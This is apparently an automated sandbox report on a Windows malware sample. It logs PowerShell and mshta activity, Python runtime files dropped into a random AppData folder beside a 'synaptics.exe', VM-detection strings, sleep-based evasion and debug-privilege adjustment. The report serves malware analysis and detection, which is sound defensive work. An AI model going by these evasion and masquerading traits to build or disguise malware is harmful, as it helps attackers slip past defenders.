                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6533Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3352Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4797
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4916
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3493
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1728
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4878
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1383
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\_testconsole.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\_lzma.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\Crypto\Hash\_BLAKE2b.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\Crypto\Cipher\_raw_des.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\_queue.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\_msi.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\pyexpat.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\Crypto\Hash\_MD5.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\win32\odbc.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\Crypto\Hash\_MD4.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\Crypto\Cipher\_raw_cfb.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\_ssl.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\win32\pythonservice.exeJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\Crypto\Cipher\_chacha20.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\win32\servicemanager.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\Crypto\Cipher\_raw_ecb.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\select.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\Crypto\Hash\_SHA256.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\_testmultiphase.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\Crypto\Cipher\_raw_ocb.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\Crypto\Cipher\_raw_aes.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\_multiprocessing.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\Crypto\Cipher\_raw_ofb.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\_testinternalcapi.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\unicodedata.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\_testbuffer.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\Crypto\Hash\_MD2.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\Crypto\Hash\_SHA384.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\_tkinter.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\_hashlib.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\_testimportmultiple.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\charset_normalizer\md.cp310-win32.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\_overlapped.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\_ctypes.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\Crypto\Cipher\_raw_blowfish.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\_testcapi.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\_socket.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\win32\perfmon.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\winsound.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\Crypto\Cipher\_Salsa20.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\charset_normalizer\md__mypyc.cp310-win32.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\Crypto\Hash\_SHA512.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\tk86t.dllJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\_decimal.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\_bz2.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\_uuid.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\_asyncio.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\Crypto\Cipher\_pkcs1_decode.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\Crypto\Hash\_poly1305.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\Crypto\Cipher\_raw_cbc.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\_zoneinfo.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\win32\mmapfile.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\Crypto\Hash\_ghash_clmul.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\Crypto\Hash\_BLAKE2s.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\Crypto\Cipher\_raw_des3.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\_sqlite3.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\Crypto\Hash\_keccak.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\Crypto\Cipher\_ARC4.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\Crypto\Cipher\_raw_ctr.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\_elementtree.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\_ctypes_test.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\tcl86t.dllJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\Crypto\Hash\_ghash_portable.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\Crypto\Cipher\_raw_aesni.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\Crypto\Cipher\_raw_arc2.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\Crypto\Cipher\_raw_eksblowfish.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\win32\perfmondata.dllJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\Crypto\Cipher\_raw_cast.pydJump to dropped file
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeAPI coverage: 0.8 %
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeAPI coverage: 3.3 %
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7836Thread sleep count: 6533 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7840Thread sleep count: 3352 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7868Thread sleep time: -11068046444225724s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2308Thread sleep count: 4797 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5828Thread sleep count: 4916 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4812Thread sleep time: -11990383647911201s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7756Thread sleep count: 3493 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7736Thread sleep count: 1728 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2080Thread sleep time: -3689348814741908s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7232Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7588Thread sleep count: 4878 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7656Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7588Thread sleep count: 1383 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7596Thread sleep time: -1844674407370954s >= -30000s
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C0A8C40 PySequence_Size,_PyObject_GC_NewVar,PyObject_GC_Track,_Py_Dealloc,GetSystemInfo,VirtualAlloc,PyErr_NoMemory,PyErr_NoMemory,PySequence_GetItem,ffi_prep_cif,PyExc_RuntimeError,PyExc_RuntimeError,PyErr_Format,ffi_prep_closure,PyExc_TypeError,PyExc_TypeError,PyErr_SetString,24_2_6C0A8C40
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: synaptics.exe, 00000014.00000003.2556255075.0000000000C27000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2542431532.0000000000C1F000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2552235378.0000000000C27000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2558157600.0000000000C1F000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2543638840.0000000000C1F000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2557524082.0000000000C26000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2556953102.0000000000C1F000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2739346472.0000000000C1F000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2700615310.0000000000C1F000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2547022879.0000000000C1F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllV
                Source: mshta.exe, 00000003.00000003.1783407695.000002B148978000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}DD
                Source: mshta.exe, 00000003.00000002.1786335637.000002B148978000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}DD
                Source: mshta.exe, 00000003.00000003.1779454611.000002B94B309000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1788651910.000002B94B30B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1777425806.000002B94B309000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1759748525.000002B94B309000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1783148426.000002B94B309000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1750775151.000002B94B309000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_00CA1710 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,24_2_00CA1710
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF4B6C0 _DllMain@12,GetModuleHandleW,LoadLibraryW,GetProcAddress,GetProcAddress,AddAccessAllowedAce,GetProcAddress,AddAccessDeniedAce,GetProcAddress,AddAccessAllowedAceEx,GetProcAddress,AddMandatoryAce,GetProcAddress,AddAccessAllowedObjectAce,GetProcAddress,AddAccessDeniedAceEx,GetProcAddress,AddAccessDeniedObjectAce,GetProcAddress,AddAuditAccessAceEx,GetProcAddress,AddAuditAccessObjectAce,GetProcAddress,SetSecurityDescriptorControl,InitializeCriticalSection,TlsAlloc,DeleteCriticalSection,TlsFree,24_2_6BF4B6C0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6C66C400 PyThread_start_new_thread,GetProcessHeap,HeapAlloc,_beginthreadex,_errno,GetProcessHeap,HeapFree,CloseHandle,27_2_6C66C400
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_00CA1278 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,24_2_00CA1278
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_00CA1710 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,24_2_00CA1710
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_00CA18A7 SetUnhandledExceptionFilter,24_2_00CA18A7
